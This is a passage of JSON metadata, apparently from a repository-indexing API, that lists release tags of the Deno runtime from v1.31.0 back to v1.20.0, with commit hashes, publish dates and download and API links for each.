o/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"